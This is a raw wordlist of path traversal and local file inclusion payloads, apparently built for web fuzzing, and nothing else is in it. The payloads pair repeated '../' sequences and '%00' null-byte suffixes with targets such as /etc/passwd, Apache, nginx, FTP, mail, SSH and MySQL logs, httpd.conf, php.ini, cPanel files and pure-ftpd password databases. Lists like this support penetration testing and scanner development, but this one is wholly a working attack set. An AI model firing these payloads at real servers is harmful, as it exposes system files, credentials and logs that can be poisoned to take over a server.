../../../../../../../../../../etc/passwd
/etc/passwd
../../../../../../../../../../etc/passwd%00
/etc/passwd%00
../../../../../../../../../../apache2/logs/access.log
../../../../../../../../../../apache2/logs/access
/apache2/logs/access.log
/apache2/logs/access
../../../../../../../../../../apache2/logs/access.log%00
../../../../../../../../../../apache2/logs/access%00
/apache2/logs/access.log%00
/apache2/logs/access%00
../../../../../../../../../../apache2/logs/error.log
../../../../../../../../../../apache2/logs/error
/apache2/logs/error.log
/apache2/logs/error
../../../../../../../../../../apache2/logs/error.log%00
../../../../../../../../../../apache2/logs/error%00
/apache2/logs/error.log%00
/apache2/logs/error%00
../../../../../../../../../../apache/logs/access.log
../../../../../../../../../../apache/logs/access
/apache/logs/access.log
/apache/logs/access
../../../../../../../../../../apache/logs/access.log%00
../../../../../../../../../../apache/logs/access%00
/apache/logs/access.log%00
/apache/logs/access%00
../../../../../../../../../../apache/logs/error.log
../../../../../../../../../../apache/logs/error
/apache/logs/error.log
/apache/logs/error
../../../../../../../../../../apache/logs/error.log%00
../../../../../../../../../../apache/logs/error%00
/apache/logs/error.log%00
/apache/logs/error%00
../../../../../../../../../../etc/apache2/conf/httpd.conf
../../../../../../../../../../logs/access.log
../../../../../../../../../../logs/access
../../../../../../../../../../logs/access_log
/logs/access.log
/logs/access
/logs/access_log
../../../../../../../../../../logs/access.log%00
../../../../../../../../../../logs/access%00
../../../../../../../../../../logs/access_log%00
/logs/access.log%00
/logs/access%00
/logs/access_log%00
../../../../../../../../../../logs/error.log
../../../../../../../../../../logs/error
../../../../../../../../../../logs/error_log
/logs/error.log
/logs/error
/logs/error_log
../../../../../../../../../../logs/error.log%00
../../../../../../../../../../logs/error%00
../../../../../../../../../../logs/error_log%00
/logs/error.log%00
/logs/error%00
/logs/error_log%00
../../../../../../../../../../logs/pure-ftpd.log
../../../../../../../../../../logs/pure-ftpd
/logs/pure-ftpd.log
/logs/pure-ftpd
../../../../../../../../../../logs/pure-ftpd.log%00
../../../../../../../../../../logs/pure-ftpd%00
/logs/pure-ftpd.log%00
/logs/pure-ftpd%00
../../../../../../../../../../NetServer/bin/stable/apache/php.ini
../../../../../../../../../../var/adm/log/xfer.log
../../../../../../../../../../var/adm/log/xfer
../../../../../../../../../../var/adm/log/xferlog
/var/adm/log/xfer.log
/var/adm/log/xfer
/var/adm/log/xferlog
../../../../../../../../../../var/adm/log/xfer.log%00
../../../../../../../../../../var/adm/log/xfer%00
../../../../../../../../../../var/adm/log/xferlog%00
/var/adm/log/xfer.log%00
/var/adm/log/xfer%00
/var/adm/log/xferlog%00
../../../../../../../../../../var/cpanel/cpanel.config
/var/cpanel/cpanel.config
../../../../../../../../../../var/cpanel/cpanel.config%00
/var/cpanel/cpanel.config%00
../../../../../../../../../../var/lib/mysql/my.cnf
/var/lib/mysql/my.cnf
../../../../../../../../../../var/lib/mysql/my.cnf%00
/var/lib/mysql/my.cnf%00
../../../../../../../../../../var/local/www/conf/php.ini
/var/local/www/conf/php.ini
../../../../../../../../../../var/local/www/conf/php.ini%00
/var/local/www/conf/php.ini%00
../../../../../../../../../../var/log/access.log
../../../../../../../../../../var/log/access
../../../../../../../../../../var/log/access_log
/var/log/access.log
/var/log/access
/var/log/access_log
../../../../../../../../../../var/log/access.log%00
../../../../../../../../../../var/log/access%00
../../../../../../../../../../var/log/access_log%00
/var/log/access.log%00
/var/log/access%00
/var/log/access_log%00
../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/log/apache2/access
../../../../../../../../../../var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/access
/var/log/apache2/access_log
../../../../../../../../../../var/log/apache2/access.log%00
../../../../../../../../../../var/log/apache2/access%00
../../../../../../../../../../var/log/apache2/access_log%00
/var/log/apache2/access.log%00
/var/log/apache2/access%00
/var/log/apache2/access_log%00
../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../var/log/apache2/error
../../../../../../../../../../var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/error
/var/log/apache2/error_log
../../../../../../../../../../var/log/apache2/error.log%00
../../../../../../../../../../var/log/apache2/error%00
../../../../../../../../../../var/log/apache2/error_log%00
/var/log/apache2/error.log%00
/var/log/apache2/error%00
/var/log/apache2/error_log%00
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/apache/access
../../../../../../../../../../var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/access
/var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log%00
../../../../../../../../../../var/log/apache/access%00
../../../../../../../../../../var/log/apache/access_log%00
/var/log/apache/access.log%00
/var/log/apache/access%00
/var/log/apache/access_log%00
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/apache/error
../../../../../../../../../../var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/error
/var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log%00
../../../../../../../../../../var/log/apache/error%00
../../../../../../../../../../var/log/apache/error_log%00
/var/log/apache/error.log%00
/var/log/apache/error%00
/var/log/apache/error_log%00
../../../../../../../../../../var/log/auth
/var/log/auth
../../../../../../../../../../var/log/auth%00
/var/log/auth%00
../../../../../../../../../../var/log/auth.log
/var/log/auth.log
../../../../../../../../../../var/log/auth.log%00
/var/log/auth.log%00
../../../../../../../../../../var/log/error.log
../../../../../../../../../../var/log/error
../../../../../../../../../../var/log/error_log
/var/log/error.log
/var/log/error
/var/log/error_log
../../../../../../../../../../var/log/error.log%00
../../../../../../../../../../var/log/error%00
../../../../../../../../../../var/log/error_log%00
/var/log/error.log%00
/var/log/error%00
/var/log/error_log%00
../../../../../../../../../../var/log/exim.ain.log
../../../../../../../../../../var/log/exim.ain
/var/log/exim.ain.log
/var/log/exim.ain
../../../../../../../../../../var/log/exim.ain.log%00
../../../../../../../../../../var/log/exim.ain%00
/var/log/exim.ain.log%00
/var/log/exim.ain%00
../../../../../../../../../../var/log/exim.anic.log
../../../../../../../../../../var/log/exim.anic
/var/log/exim.anic.log
/var/log/exim.anic
../../../../../../../../../../var/log/exim.anic.log%00
../../../../../../../../../../var/log/exim.anic%00
/var/log/exim.anic.log%00
/var/log/exim.anic%00
../../../../../../../../../../var/log/exim.eject.log
../../../../../../../../../../var/log/exim.eject
/var/log/exim.eject.log
/var/log/exim.eject
../../../../../../../../../../var/log/exim.eject.log%00
../../../../../../../../../../var/log/exim.eject%00
/var/log/exim.eject.log%00
/var/log/exim.eject%00
../../../../../../../../../../var/log/exim/main.log
../../../../../../../../../../var/log/exim/main
../../../../../../../../../../var/log/exim/mainlog
../../../../../../../../../../var/log/exim_mainlog
/var/log/exim/main.log
/var/log/exim/main
/var/log/exim/mainlog
/var/log/exim_mainlog
../../../../../../../../../../var/log/exim/main.log%00
../../../../../../../../../../var/log/exim/main%00
../../../../../../../../../../var/log/exim/mainlog%00
../../../../../../../../../../var/log/exim_mainlog%00
/var/log/exim/main.log%00
/var/log/exim/main%00
/var/log/exim/mainlog%00
/var/log/exim_mainlog%00
../../../../../../../../../../var/log/exim/panic.log
../../../../../../../../../../var/log/exim/panic
../../../../../../../../../../var/log/exim/paniclog
../../../../../../../../../../var/log/exim_paniclog
/var/log/exim/panic.log
/var/log/exim/panic
/var/log/exim/paniclog
/var/log/exim_paniclog
../../../../../../../../../../var/log/exim/panic.log%00
../../../../../../../../../../var/log/exim/panic%00
../../../../../../../../../../var/log/exim/paniclog%00
../../../../../../../../../../var/log/exim_paniclog%00
/var/log/exim/panic.log%00
/var/log/exim/panic%00
/var/log/exim/paniclog%00
/var/log/exim_paniclog%00
../../../../../../../../../../var/log/exim/reject.log
../../../../../../../../../../var/log/exim/reject
../../../../../../../../../../var/log/exim/rejectlog
../../../../../../../../../../var/log/exim_rejectlog
/var/log/exim/reject.log
/var/log/exim/reject
/var/log/exim/rejectlog
/var/log/exim_rejectlog
../../../../../../../../../../var/log/exim/reject.log%00
../../../../../../../../../../var/log/exim/reject%00
../../../../../../../../../../var/log/exim/rejectlog%00
../../../../../../../../../../var/log/exim_rejectlog%00
/var/log/exim/reject.log%00
/var/log/exim/reject%00
/var/log/exim/rejectlog%00
/var/log/exim_rejectlog%00
../../../../../../../../../../var/log/ftp.log
../../../../../../../../../../var/log/ftp
../../../../../../../../../../var/log/ftplog
/var/log/ftp.log
/var/log/ftp
/var/log/ftplog
../../../../../../../../../../var/log/ftp.log%00
../../../../../../../../../../var/log/ftp%00
../../../../../../../../../../var/log/ftplog%00
/var/log/ftp.log%00
/var/log/ftp%00
/var/log/ftplog%00
../../../../../../../../../../var/log/ftp-proxy
/var/log/ftp-proxy
../../../../../../../../../../var/log/ftp-proxy%00
/var/log/ftp-proxy%00
../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log
../../../../../../../../../../var/log/ftp-proxy/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy/ftp-proxy
../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log%00
../../../../../../../../../../var/log/ftp-proxy/ftp-proxy%00
/var/log/ftp-proxy/ftp-proxy.log%00
/var/log/ftp-proxy/ftp-proxy%00
../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../var/log/httpd-access
../../../../../../../../../../var/log/httpd/access.log
../../../../../../../../../../var/log/httpd/access
../../../../../../../../../../var/log/httpd/access_log
/var/log/httpd-access.log
/var/log/httpd-access
/var/log/httpd/access.log
/var/log/httpd/access
/var/log/httpd/access_log
../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../var/log/httpd-access%00
../../../../../../../../../../var/log/httpd/access.log%00
../../../../../../../../../../var/log/httpd/access%00
../../../../../../../../../../var/log/httpd/access_log%00
/var/log/httpd-access.log%00
/var/log/httpd-access%00
/var/log/httpd/access.log%00
/var/log/httpd/access%00
/var/log/httpd/access_log%00
../../../../../../../../../../var/log/httpd/error.log
../../../../../../../../../../var/log/httpd/error
../../../../../../../../../../var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpd/error
/var/log/httpd/error_log
../../../../../../../../../../var/log/httpd/error.log%00
../../../../../../../../../../var/log/httpd/error%00
../../../../../../../../../../var/log/httpd/error_log%00
/var/log/httpd/error.log%00
/var/log/httpd/error%00
/var/log/httpd/error_log%00
../../../../../../../../../../var/log/mail.log
../../../../../../../../../../var/log/mail
../../../../../../../../../../var/log/maillog
/var/log/mail.log
/var/log/mail
/var/log/maillog
../../../../../../../../../../var/log/mail.log%00
../../../../../../../../../../var/log/mail%00
../../../../../../../../../../var/log/maillog%00
/var/log/mail.log%00
/var/log/mail%00
/var/log/maillog%00
../../../../../../../../../../var/log/mysqlderror.log
../../../../../../../../../../var/log/mysqlderror
/var/log/mysqlderror.log
/var/log/mysqlderror
../../../../../../../../../../var/log/mysqlderror.log%00
../../../../../../../../../../var/log/mysqlderror%00
/var/log/mysqlderror.log%00
/var/log/mysqlderror%00
../../../../../../../../../../var/log/mysql.log
../../../../../../../../../../var/log/mysql
/var/log/mysql.log
/var/log/mysql
../../../../../../../../../../var/log/mysql.log%00
../../../../../../../../../../var/log/mysql%00
/var/log/mysql.log%00
/var/log/mysql%00
../../../../../../../../../../var/log/mysql/mysql-bin.log
../../../../../../../../../../var/log/mysql/mysql-bin
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-bin
../../../../../../../../../../var/log/mysql/mysql-bin.log%00
../../../../../../../../../../var/log/mysql/mysql-bin%00
/var/log/mysql/mysql-bin.log%00
/var/log/mysql/mysql-bin%00
../../../../../../../../../../var/log/mysql/mysql.log
../../../../../../../../../../var/log/mysql/mysql
/var/log/mysql/mysql.log
/var/log/mysql/mysql
../../../../../../../../../../var/log/mysql/mysql.log%00
../../../../../../../../../../var/log/mysql/mysql%00
/var/log/mysql/mysql.log%00
/var/log/mysql/mysql%00
../../../../../../../../../../var/log/mysql/mysql-slow.log
../../../../../../../../../../var/log/mysql/mysql-slow
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow
../../../../../../../../../../var/log/mysql/mysql-slow.log%00
../../../../../../../../../../var/log/mysql/mysql-slow%00
/var/log/mysql/mysql-slow.log%00
/var/log/mysql/mysql-slow%00
../../../../../../../../../../var/log/nginx/access.log
../../../../../../../../../../var/log/nginx/access
../../../../../../../../../../var/log/nginx/access_log
/var/log/nginx/access.log
/var/log/nginx/access
/var/log/nginx/access_log
../../../../../../../../../../var/log/nginx/access.log%00
../../../../../../../../../../var/log/nginx/access%00
../../../../../../../../../../var/log/nginx/access_log%00
/var/log/nginx/access.log%00
/var/log/nginx/access%00
/var/log/nginx/access_log%00
../../../../../../../../../../var/log/nginx/error.log
../../../../../../../../../../var/log/nginx/error
../../../../../../../../../../var/log/nginx/error_log
/var/log/nginx/error.log
/var/log/nginx/error
/var/log/nginx/error_log
../../../../../../../../../../var/log/nginx/error.log%00
../../../../../../../../../../var/log/nginx/error%00
../../../../../../../../../../var/log/nginx/error_log%00
/var/log/nginx/error.log%00
/var/log/nginx/error%00
/var/log/nginx/error_log%00
../../../../../../../../../../var/log/proftpd
/var/log/proftpd
../../../../../../../../../../var/log/proftpd%00
/var/log/proftpd%00
../../../../../../../../../../var/log/pureftpd.log
../../../../../../../../../../var/log/pureftpd
/var/log/pureftpd.log
/var/log/pureftpd
../../../../../../../../../../var/log/pureftpd.log%00
../../../../../../../../../../var/log/pureftpd%00
/var/log/pureftpd.log%00
/var/log/pureftpd%00
../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log
../../../../../../../../../../var/log/pure-ftpd/pure-ftpd
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pure-ftpd/pure-ftpd
../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log%00
../../../../../../../../../../var/log/pure-ftpd/pure-ftpd%00
/var/log/pure-ftpd/pure-ftpd.log%00
/var/log/pure-ftpd/pure-ftpd%00
../../../../../../../../../../var/log/sshd.log
../../../../../../../../../../var/log/sshd
/var/log/sshd.log
/var/log/sshd
../../../../../../../../../../var/log/sshd.log%00
../../../../../../../../../../var/log/sshd%00
/var/log/sshd.log%00
/var/log/sshd%00
../../../../../../../../../../var/log/vsftpd.log
../../../../../../../../../../var/log/vsftpd
/var/log/vsftpd.log
/var/log/vsftpd
../../../../../../../../../../var/log/vsftpd.log%00
../../../../../../../../../../var/log/vsftpd%00
/var/log/vsftpd.log%00
/var/log/vsftpd%00
../../../../../../../../../../var/log/xfer.log
../../../../../../../../../../var/log/xfer
../../../../../../../../../../var/log/xferlog
/var/log/xfer.log
/var/log/xfer
/var/log/xferlog
../../../../../../../../../../var/log/xfer.log%00
../../../../../../../../../../var/log/xfer%00
../../../../../../../../../../var/log/xferlog%00
/var/log/xfer.log%00
/var/log/xfer%00
/var/log/xferlog%00
../../../../../../../../../../var/mysql.log
../../../../../../../../../../var/mysql
/var/mysql.log
/var/mysql
../../../../../../../../../../var/mysql.log%00
../../../../../../../../../../var/mysql%00
/var/mysql.log%00
/var/mysql%00
../../../../../../../../../../var/www/conf/httpd.conf
/var/www/conf/httpd.conf
../../../../../../../../../../var/www/conf/httpd.conf%00
/var/www/conf/httpd.conf%00
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../var/www/logs/access
../../../../../../../../../../var/www/logs/access_log
/var/www/logs/access.log
/var/www/logs/access
/var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log%00
../../../../../../../../../../var/www/logs/access%00
../../../../../../../../../../var/www/logs/access_log%00
/var/www/logs/access.log%00
/var/www/logs/access%00
/var/www/logs/access_log%00
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../var/www/logs/error
../../../../../../../../../../var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/error
/var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log%00
../../../../../../../../../../var/www/logs/error%00
../../../../../../../../../../var/www/logs/error_log%00
/var/www/logs/error.log%00
/var/www/logs/error%00
/var/www/logs/error_log%00
../../../../../../../../../../apache/php/php.ini
/apache/php/php.ini
../../../../../../../../../../apache/php/php.ini%00
/apache/php/php.ini%00
../../../../../../../../../../bin/php.ini
/bin/php.ini
../../../../../../../../../../bin/php.ini%00
/bin/php.ini%00
/NetServer/bin/stable/apache/php.ini
../../../../../../../../../../NetServer/bin/stable/apache/php.ini%00
/NetServer/bin/stable/apache/php.ini%00
../../../../../../../../../../opt/apache2/conf/httpd.conf
/opt/apache2/conf/httpd.conf
../../../../../../../../../../opt/apache2/conf/httpd.conf%00
/opt/apache2/conf/httpd.conf%00
../../../../../../../../../../opt/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
../../../../../../../../../../opt/apache/conf/httpd.conf%00
/opt/apache/conf/httpd.conf%00
../../../../../../../../../../opt/lampp/logs/access.log
../../../../../../../../../../opt/lampp/logs/access
../../../../../../../../../../opt/lampp/logs/access_log
/opt/lampp/logs/access.log
/opt/lampp/logs/access
/opt/lampp/logs/access_log
../../../../../../../../../../opt/lampp/logs/access.log%00
../../../../../../../../../../opt/lampp/logs/access%00
../../../../../../../../../../opt/lampp/logs/access_log%00
/opt/lampp/logs/access.log%00
/opt/lampp/logs/access%00
/opt/lampp/logs/access_log%00
../../../../../../../../../../opt/lampp/logs/error.log
../../../../../../../../../../opt/lampp/logs/error
../../../../../../../../../../opt/lampp/logs/error_log
/opt/lampp/logs/error.log
/opt/lampp/logs/error
/opt/lampp/logs/error_log
../../../../../../../../../../opt/lampp/logs/error.log%00
../../../../../../../../../../opt/lampp/logs/error%00
../../../../../../../../../../opt/lampp/logs/error_log%00
/opt/lampp/logs/error.log%00
/opt/lampp/logs/error%00
/opt/lampp/logs/error_log%00
../../../../../../../../../../opt/xampp/etc/php.ini
/opt/xampp/etc/php.ini
../../../../../../../../../../opt/xampp/etc/php.ini%00
/opt/xampp/etc/php.ini%00
../../../../../../../../../../opt/xampp/logs/access.log
../../../../../../../../../../opt/xampp/logs/access
../../../../../../../../../../opt/xampp/logs/access_log
/opt/xampp/logs/access.log
/opt/xampp/logs/access
/opt/xampp/logs/access_log
../../../../../../../../../../opt/xampp/logs/access.log%00
../../../../../../../../../../opt/xampp/logs/access%00
../../../../../../../../../../opt/xampp/logs/access_log%00
/opt/xampp/logs/access.log%00
/opt/xampp/logs/access%00
/opt/xampp/logs/access_log%00
../../../../../../../../../../opt/xampp/logs/error.log
../../../../../../../../../../opt/xampp/logs/error
../../../../../../../../../../opt/xampp/logs/error_log
/opt/xampp/logs/error.log
/opt/xampp/logs/error
/opt/xampp/logs/error_log
../../../../../../../../../../opt/xampp/logs/error.log%00
../../../../../../../../../../opt/xampp/logs/error%00
../../../../../../../../../../opt/xampp/logs/error_log%00
/opt/xampp/logs/error.log%00
/opt/xampp/logs/error%00
/opt/xampp/logs/error_log%00
../../../../../../../../../../php4/php.ini
../../../../../../../../../../usr/apache2/conf/httpd.conf
/usr/apache2/conf/httpd.conf
../../../../../../../../../../usr/apache2/conf/httpd.conf%00
/usr/apache2/conf/httpd.conf%00
../../../../../../../../../../usr/apache/conf/httpd.conf
/usr/apache/conf/httpd.conf
../../../../../../../../../../usr/apache/conf/httpd.conf%00
/usr/apache/conf/httpd.conf%00
../../../../../../../../../../usr/etc/pure-ftpd.conf
/usr/etc/pure-ftpd.conf
../../../../../../../../../../usr/etc/pure-ftpd.conf%00
/usr/etc/pure-ftpd.conf%00
../../../../../../../../../../usr/lib/php.ini
/usr/lib/php.ini
../../../../../../../../../../usr/lib/php.ini%00
/usr/lib/php.ini%00
../../../../../../../../../../usr/lib/php/php.ini
/usr/lib/php/php.ini
../../../../../../../../../../usr/lib/php/php.ini%00
/usr/lib/php/php.ini%00
../../../../../../../../../../usr/lib/security/mkuser.default
/usr/lib/security/mkuser.default
../../../../../../../../../../usr/lib/security/mkuser.default%00
/usr/lib/security/mkuser.default%00
../../../../../../../../../../usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00
/usr/local/apache2/conf/httpd.conf%00
../../../../../../../../../../usr/local/apache2/httpd.conf
/usr/local/apache2/httpd.conf
../../../../../../../../../../usr/local/apache2/httpd.conf%00
/usr/local/apache2/httpd.conf%00
../../../../../../../../../../usr/local/apache2/logs/access.log
../../../../../../../../../../usr/local/apache2/logs/access
../../../../../../../../../../usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access
/usr/local/apache2/logs/access_log
../../../../../../../../../../usr/local/apache2/logs/access.log%00
../../../../../../../../../../usr/local/apache2/logs/access%00
../../../../../../../../../../usr/local/apache2/logs/access_log%00
/usr/local/apache2/logs/access.log%00
/usr/local/apache2/logs/access%00
/usr/local/apache2/logs/access_log%00
../../../../../../../../../../usr/local/apache2/logs/error.log
../../../../../../../../../../usr/local/apache2/logs/error
../../../../../../../../../../usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error
/usr/local/apache2/logs/error_log
../../../../../../../../../../usr/local/apache2/logs/error.log%00
../../../../../../../../../../usr/local/apache2/logs/error%00
../../../../../../../../../../usr/local/apache2/logs/error_log%00
/usr/local/apache2/logs/error.log%00
/usr/local/apache2/logs/error%00
/usr/local/apache2/logs/error_log%00
../../../../../../../../../../usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
../../../../../../../../../../usr/local/apache/conf/httpd.conf%00
/usr/local/apache/conf/httpd.conf%00
../../../../../../../../../../usr/local/apache/conf/php.ini
/usr/local/apache/conf/php.ini
../../../../../../../../../../usr/local/apache/conf/php.ini%00
/usr/local/apache/conf/php.ini%00
../../../../../../../../../../usr/local/apache/httpd.conf
/usr/local/apache/httpd.conf
../../../../../../../../../../usr/local/apache/httpd.conf%00
/usr/local/apache/httpd.conf%00
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access
../../../../../../../../../../usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access
/usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log%00
../../../../../../../../../../usr/local/apache/logs/access%00
../../../../../../../../../../usr/local/apache/logs/access_log%00
/usr/local/apache/logs/access.log%00
/usr/local/apache/logs/access%00
/usr/local/apache/logs/access_log%00
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error
../../../../../../../../../../usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error
/usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log%00
../../../../../../../../../../usr/local/apache/logs/error%00
../../../../../../../../../../usr/local/apache/logs/error_log%00
/usr/local/apache/logs/error.log%00
/usr/local/apache/logs/error%00
/usr/local/apache/logs/error_log%00
../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00
/usr/local/apps/apache2/conf/httpd.conf%00
../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf%00
/usr/local/apps/apache/conf/httpd.conf%00
../../../../../../../../../../usr/local/cpanel/logs
/usr/local/cpanel/logs
../../../../../../../../../../usr/local/cpanel/logs%00
/usr/local/cpanel/logs%00
../../../../../../../../../../usr/local/cpanel/logs/access.log
../../../../../../../../../../usr/local/cpanel/logs/access
../../../../../../../../../../usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/access.log
/usr/local/cpanel/logs/access
/usr/local/cpanel/logs/access_log
../../../../../../../../../../usr/local/cpanel/logs/access.log%00
../../../../../../../../../../usr/local/cpanel/logs/access%00
../../../../../../../../../../usr/local/cpanel/logs/access_log%00
/usr/local/cpanel/logs/access.log%00
/usr/local/cpanel/logs/access%00
/usr/local/cpanel/logs/access_log%00
../../../../../../../../../../usr/local/cpanel/logs/error.log
../../../../../../../../../../usr/local/cpanel/logs/error
../../../../../../../../../../usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/error.log
/usr/local/cpanel/logs/error
/usr/local/cpanel/logs/error_log
../../../../../../../../../../usr/local/cpanel/logs/error.log%00
../../../../../../../../../../usr/local/cpanel/logs/error%00
../../../../../../../../../../usr/local/cpanel/logs/error_log%00
/usr/local/cpanel/logs/error.log%00
/usr/local/cpanel/logs/error%00
/usr/local/cpanel/logs/error_log%00
../../../../../../../../../../usr/local/cpanel/logs/license.log
../../../../../../../../../../usr/local/cpanel/logs/license
../../../../../../../../../../usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/license.log
/usr/local/cpanel/logs/license
/usr/local/cpanel/logs/license_log
../../../../../../../../../../usr/local/cpanel/logs/license.log%00
../../../../../../../../../../usr/local/cpanel/logs/license%00
../../../../../../../../../../usr/local/cpanel/logs/license_log%00
/usr/local/cpanel/logs/license.log%00
/usr/local/cpanel/logs/license%00
/usr/local/cpanel/logs/license_log%00
../../../../../../../../../../usr/local/cpanel/logs/login.log
../../../../../../../../../../usr/local/cpanel/logs/login
../../../../../../../../../../usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/login.log
/usr/local/cpanel/logs/login
/usr/local/cpanel/logs/login_log
../../../../../../../../../../usr/local/cpanel/logs/login.log%00
../../../../../../../../../../usr/local/cpanel/logs/login%00
../../../../../../../../../../usr/local/cpanel/logs/login_log%00
/usr/local/cpanel/logs/login.log%00
/usr/local/cpanel/logs/login%00
/usr/local/cpanel/logs/login_log%00
../../../../../../../../../../usr/local/cpanel/logs/stats.log
../../../../../../../../../../usr/local/cpanel/logs/stats
../../../../../../../../../../usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats.log
/usr/local/cpanel/logs/stats
/usr/local/cpanel/logs/stats_log
../../../../../../../../../../usr/local/cpanel/logs/stats.log%00
../../../../../../../../../../usr/local/cpanel/logs/stats%00
../../../../../../../../../../usr/local/cpanel/logs/stats_log%00
/usr/local/cpanel/logs/stats.log%00
/usr/local/cpanel/logs/stats%00
/usr/local/cpanel/logs/stats_log%00
../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf
../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf%00
/usr/local/etc/apache2/conf/httpd.conf%00
../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00
/usr/local/etc/apache/conf/httpd.conf%00
../../../../../../../../../../usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache/vhosts.conf
../../../../../../../../../../usr/local/etc/apache/vhosts.conf%00
/usr/local/etc/apache/vhosts.conf%00
../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf%00
/usr/local/etc/httpd/conf/httpd.conf%00
../../../../../../../../../../usr/local/etc/php.ini
/usr/local/etc/php.ini
../../../../../../../../../../usr/local/etc/php.ini%00
/usr/local/etc/php.ini%00
../../../../../../../../../../usr/local/etc/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf
../../../../../../../../../../usr/local/etc/pure-ftpd.conf%00
/usr/local/etc/pure-ftpd.conf%00
../../../../../../../../../../usr/local/etc/pureftpd.pdb
/usr/local/etc/pureftpd.pdb
../../../../../../../../../../usr/local/etc/pureftpd.pdb%00
/usr/local/etc/pureftpd.pdb%00
../../../../../../../../../../usr/local/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
../../../../../../../../../../usr/local/httpd/conf/httpd.conf%00
/usr/local/httpd/conf/httpd.conf%00
../../../../../../../../../../usr/local/lib/php.ini
/usr/local/lib/php.ini
../../../../../../../../../../usr/local/lib/php.ini%00
/usr/local/lib/php.ini%00
../../../../../../../../../../usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf
../../../../../../../../../../usr/local/php4/httpd.conf%00
/usr/local/php4/httpd.conf%00
../../../../../../../../../../usr/local/php4/httpd.conf.php
/usr/local/php4/httpd.conf.php
../../../../../../../../../../usr/local/php4/httpd.conf.php%00
/usr/local/php4/httpd.conf.php%00
../../../../../../../../../../usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini
../../../../../../../../../../usr/local/php4/lib/php.ini%00
/usr/local/php4/lib/php.ini%00
../../../../../../../../../../usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf
../../../../../../../../../../usr/local/php5/httpd.conf%00
/usr/local/php5/httpd.conf%00
../../../../../../../../../../usr/local/php5/httpd.conf.php
/usr/local/php5/httpd.conf.php
../../../../../../../../../../usr/local/php5/httpd.conf.php%00
/usr/local/php5/httpd.conf.php%00
../../../../../../../../../../usr/local/php5/lib/php.ini
/usr/local/php5/lib/php.ini
../../../../../../../../../../usr/local/php5/lib/php.ini%00
/usr/local/php5/lib/php.ini%00
../../../../../../../../../../usr/local/php/httpd.conf
/usr/local/php/httpd.conf
../../../../../../../../../../usr/local/php/httpd.conf%00
/usr/local/php/httpd.conf%00
../../../../../../../../../../usr/local/php/httpd.conf.php
/usr/local/php/httpd.conf.php
../../../../../../../../../../usr/local/php/httpd.conf.php%00
/usr/local/php/httpd.conf.php%00
../../../../../../../../../../usr/local/php/lib/php.ini
/usr/local/php/lib/php.ini
../../../../../../../../../../usr/local/php/lib/php.ini%00
/usr/local/php/lib/php.ini%00
../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pure-ftpd.conf
../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf%00
/usr/local/pureftpd/etc/pure-ftpd.conf%00
../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb
